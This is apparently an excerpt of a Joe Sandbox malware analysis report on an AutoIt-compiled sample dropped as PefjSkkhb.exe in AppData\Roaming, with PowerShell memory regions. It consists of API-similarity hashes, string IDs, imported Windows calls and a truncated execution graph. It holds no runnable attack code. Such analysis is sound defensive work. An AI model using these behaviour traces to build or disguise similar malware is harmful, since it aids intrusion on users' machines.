                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 1752125012-2298589950
                                                                      • Opcode ID: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                      • Instruction ID: bb89ec28c81fa6adb093d74302b75768382971634f8d27915f2a5033f59f77a9
                                                                      • Opcode Fuzzy Hash: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                      • Instruction Fuzzy Hash: 9F31C432A1CB8186EB20EF55E4403AAB360FBC4BA5F908136DA8D83B54CF3CE445CB50
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateMoveObjectStock
                                                                      • String ID: Listbox
                                                                      • API String ID: 3747482310-2633736733
                                                                      • Opcode ID: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                      • Instruction ID: 8e68f4de5da35f6ec9f6c1cc3f3e02841aa5e781309568449c7dd3c373126c13
                                                                      • Opcode Fuzzy Hash: 4629ce28c24575fa998f22937708fe0feac1f339ddb28addb223e5ca3634c4d7
                                                                      • Instruction Fuzzy Hash: 25313B366097C1C6E770DF15B444A5AB7A1F7887A4F908225EEA903B98CB3DE481CF50
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume
                                                                      • String ID: %lu
                                                                      • API String ID: 2507767853-685833217
                                                                      • Opcode ID: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                      • Instruction ID: ae36bf16d33fb4679fe296d4512a2bff27bb70c936d358af77e7049fe2866bd4
                                                                      • Opcode Fuzzy Hash: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                      • Instruction Fuzzy Hash: 8231AD76608B8686DB10FF16E4801ADB3A1FB89BE4F844031EA8D83B65DF7CE595C750
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 1025951953-1010561917
                                                                      • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                      • Instruction ID: 9aee0b79a0742a8252ae66d8cc47e1f2dcf099551abeb1332dcf93f51db90884
                                                                      • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                      • Instruction Fuzzy Hash: 22312A32A19681CBE760EF15E544B5AB7A1FB88BA0F904235EB9843B54CF3CE845CF54
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                      • String ID: %s%d
                                                                      • API String ID: 2330185562-1110647743
                                                                      • Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                      • Instruction ID: 328894efca934470e9d467e9f76fae355c93b1904613f8809ec649269730f7bf
                                                                      • Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                      • Instruction Fuzzy Hash: 0F218E31A08B8291EA14FF26E4442FAA361BB49BE0F844131DE9D83765DF2CF245C3A0
                                                                      Similarity
                                                                      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                      • String ID: csm
                                                                      • API String ID: 2280078643-1018135373
                                                                      • Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                      • Instruction ID: 86ac3e75ca9c44eae6d6d6ef32cc242a846e1a20e7a05c036fce59ba163c591c
                                                                      • Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                      • Instruction Fuzzy Hash: 9F21503664864182E634FF1AE54416EB761F794BB4F800225DE8D43B95CF3CF886CB91
                                                                      Similarity
                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                      • String ID: 0
                                                                      • API String ID: 33631002-4108050209
                                                                      • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                      • Instruction ID: e2ceac7e5af8c62f87ea3e65cb81e9a8c2eef2d66710f0a94cc4d288fa6d0157
                                                                      • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                      • Instruction Fuzzy Hash: 0B21A332618B80CAD320DF25E48469EB7B4F388BA4F544226EB9D43B94CF3DD655CB40
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0EB2DD1), ref: 00007FF7C0EEAF37
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0EB2DD1), ref: 00007FF7C0EEAF4F
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                      • API String ID: 2574300362-1816364905
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-1355242751
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2574300362-4033151799
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                      • API String ID: 2574300362-199464113
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                      • API String ID: 2574300362-192647395
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      Similarity
                                                                      • API ID: Window$ClientMessageMoveRectScreenSend
                                                                      • String ID:
                                                                      • API String ID: 1249313431-0
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 2267087916-0
                                                                      Similarity
                                                                      • API ID: ErrorLast$socket
                                                                      • String ID:
                                                                      • API String ID: 1881357543-0
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      Similarity
                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                      • String ID:
                                                                      • API String ID: 3076010158-0
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                      • String ID:
                                                                      • API String ID: 4141327611-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 1083639309-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                      • String ID:
                                                                      • API String ID: 3340791633-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 1463438336-0
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7C0E8A27B,?,?,?,00007FF7C0E8A236), ref: 00007FF7C0E93DB1
                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7C0E8A27B,?,?,?,00007FF7C0E8A236), ref: 00007FF7C0E93E13
                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7C0E8A27B,?,?,?,00007FF7C0E8A236), ref: 00007FF7C0E93E4D
                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7C0E8A27B,?,?,?,00007FF7C0E8A236), ref: 00007FF7C0E93E77
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                      • String ID:
                                                                      • API String ID: 1557788787-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID:
                                                                      • API String ID: 847901565-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                      • String ID: cdecl
                                                                      • API String ID: 4031866154-3896280584
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                      • String ID:
                                                                      • API String ID: 837644225-0
                                                                      APIs
                                                                        • Part of subcall function 00007FF7C0E52A54: GetWindowLongPtrW.USER32 ref: 00007FF7C0E52A71
                                                                      • GetClientRect.USER32(?,?,?,?,?,00007FF7C0E9AA36,?,?,?,?,?,?,?,?,?,00007FF7C0E527AF), ref: 00007FF7C0F022C4
                                                                      • GetCursorPos.USER32(?,?,?,?,?,00007FF7C0E9AA36,?,?,?,?,?,?,?,?,?,00007FF7C0E527AF), ref: 00007FF7C0F022CF
                                                                      • ScreenToClient.USER32 ref: 00007FF7C0F022DD
                                                                      • DefDlgProcW.USER32(?,?,?,?,?,00007FF7C0E9AA36,?,?,?,?,?,?,?,?,?,00007FF7C0E527AF), ref: 00007FF7C0F0231F
                                                                        • Part of subcall function 00007FF7C0EFE894: LoadCursorW.USER32 ref: 00007FF7C0EFE945
                                                                      Similarity
                                                                      • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1626762757-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                      • String ID:
                                                                      • API String ID: 3970641297-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _ctrlfp
                                                                      • String ID:
                                                                      • API String ID: 697997973-0
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2979156933-0
                                                                      Similarity
                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                      • String ID:
                                                                      • API String ID: 357397906-0
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      Similarity
                                                                      • API ID: ErrorLast$abort
                                                                      • String ID:
                                                                      • API String ID: 1447195878-0
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID:
                                                                      • API String ID: 2875609808-0
                                                                      Similarity
                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                      • String ID:
                                                                      • API String ID: 1539411459-0
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: gfffffff
                                                                      • API String ID: 3215553584-1523873471
                                                                      Similarity
                                                                      • API ID: ContainedObject
                                                                      • String ID: AutoIt3GUI$Container
                                                                      • API String ID: 3565006973-3941886329
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: e+000$gfff
                                                                      • API String ID: 3215553584-3030954782
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: FileModuleName_invalid_parameter_noinfo
                                                                      • String ID: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
                                                                      • API String ID: 3307058713-2188861997
                                                                      Similarity
                                                                      • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                      • String ID: static
                                                                      • API String ID: 3467290483-2160076837
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                                                      • String ID: 255.255.255.255
                                                                      • API String ID: 2496851823-2422070025
                                                                      Similarity
                                                                      • API ID: _snwprintf
                                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                                      • API String ID: 3988819677-2584243854
                                                                      Similarity
                                                                      • API ID: Window$CreateMessageObjectSendStock
                                                                      • String ID: $SysTabControl32
                                                                      • API String ID: 2080134422-3143400907
                                                                      Similarity
                                                                      • API ID: FileHandleType
                                                                      • String ID: @
                                                                      • API String ID: 3000768030-2766056989
                                                                      Similarity
                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                      • String ID: static
                                                                      • API String ID: 1983116058-2160076837
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Combobox
                                                                      • API String ID: 1025951953-2096851135
                                                                      Similarity
                                                                      • API ID: LengthMessageSendTextWindow
                                                                      • String ID: edit
                                                                      • API String ID: 2978978980-2167791130
                                                                      Similarity
                                                                      • API ID: _handle_error
                                                                      • String ID: "$pow
                                                                      • API String ID: 1757819995-713443511
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 3678867486-1403004172
                                                                      Similarity
                                                                      • API ID: Internet$OpenOption
                                                                      • String ID: <local>
                                                                      • API String ID: 942729171-4266983199
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 3678867486-1403004172
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 3678867486-1403004172
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID:
                                                                      • API String ID: 3712363035-3916222277
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 3678867486-1403004172
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                      • String ID: !$tan
                                                                      • API String ID: 3384550415-2428968949
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                      • String ID: !$sin
                                                                      • API String ID: 3384550415-1565623160
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _ctrlfp_handle_error_raise_exc
                                                                      • String ID: !$cos
                                                                      • API String ID: 3384550415-1949035351
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _handle_error
                                                                      • String ID: "$exp
                                                                      • API String ID: 1757819995-2878093337
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: AutoIt$Error allocating memory.
                                                                      • API String ID: 2030045667-4017498283
                                                                      APIs
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7C0E775E9
                                                                      • TlsSetValue.KERNEL32(?,?,?,00007FF7C0E77241,?,?,?,?,00007FF7C0E7660C,?,?,?,?,00007FF7C0E74CD3), ref: 00007FF7C0E77600
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Valuetry_get_function
                                                                      • String ID: FlsSetValue
                                                                      • API String ID: 738293619-3750699315
                                                                      APIs
                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7C0E75629
                                                                      • _CxxThrowException.LIBVCRUNTIME ref: 00007FF7C0E7563A
                                                                        • Part of subcall function 00007FF7C0E77018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C0E7563F), ref: 00007FF7C0E7708D
                                                                        • Part of subcall function 00007FF7C0E77018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C0E7563F), ref: 00007FF7C0E770BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                      • String ID: Unknown exception
                                                                      • API String ID: 3561508498-410509341
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2505786014.00007FF848670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848670000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_7ff848670000_powershell.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2505786014.00007FF848670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848670000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_7ff848670000_powershell.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2504561909.00007FF8485A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8485A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_7ff8485a0000_powershell.jbxd

                                                                      Execution Graph

                                                                      Execution Coverage:4%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:2000
                                                                      Total number of Limit Nodes:88
98592->98593 98608 6c3f79 98593->98608 98595 713910 98595->98550 98597 71394d 3 API calls 98596->98597 98598 713990 98597->98598 98598->98552 98600 6c404e 98599->98600 98601 6c4085 98599->98601 98602 6d0fe6 Mailbox 59 API calls 98600->98602 98603 6c3f20 59 API calls 98601->98603 98604 6c4055 WideCharToMultiByte 98602->98604 98605 6c4077 98603->98605 98606 6c3f79 59 API calls 98604->98606 98605->98550 98606->98605 98607->98552 98609 6c3fc5 98608->98609 98610 6c3f87 98608->98610 98632 7136bf 59 API calls _memmove 98609->98632 98610->98609 98612 6c3f92 98610->98612 98613 6c3fa0 98612->98613 98614 7005fe 98612->98614 98628 6c3f3c 98613->98628 98616 6c1c7e 59 API calls 98614->98616 98618 700608 98616->98618 98617 6c3fa8 _memmove 98617->98595 98619 6d0fe6 Mailbox 59 API calls 98618->98619 98620 70061a 98619->98620 98622 7005e0 98621->98622 98623 6c3f31 98621->98623 98624 6c1c7e 59 API calls 98622->98624 98623->98595 98625 7005ea 98624->98625 98626 6d0fe6 Mailbox 59 API calls 98625->98626 98627 7005f6 98626->98627 98629 6c3f4e 98628->98629 98631 6c3f6c 98628->98631 98630 6d0fe6 Mailbox 59 API calls 98629->98630 98630->98631 98631->98617 98632->98617 98633->98555 98635 71385e 98634->98635 98636 713853 98634->98636 98635->98559 98641 6c42ae SetFilePointerEx 98636->98641 98638 7138b8 SetFilePointerEx 98642 6c42ae SetFilePointerEx 98638->98642 98640 7138d7 98640->98559 98641->98638 98642->98640 98644 7006fc 98643->98644 98645 6c4312 CreateFileW 98643->98645 98646 700702 CreateFileW 98644->98646 98648 6c4334 98644->98648 98645->98648 98647 700728 98646->98647 98646->98648 98672 6c410a 98647->98672 98648->98574 98652 6c3c7c 98651->98652 98653 700549 98651->98653 98654 6c410a 2 API calls 98652->98654 98667 6c3d0b 98652->98667 98653->98667 98691 6c41d6 98653->98691 98655 6c3c9e 98654->98655 98682 6c433f 98655->98682 98659 6c3cb5 98660 6d0fe6 Mailbox 59 API calls 98659->98660 98661 6c3cc0 98660->98661 98662 6c433f 59 API calls 98661->98662 98663 6c3ccb 98662->98663 98685 6c4220 
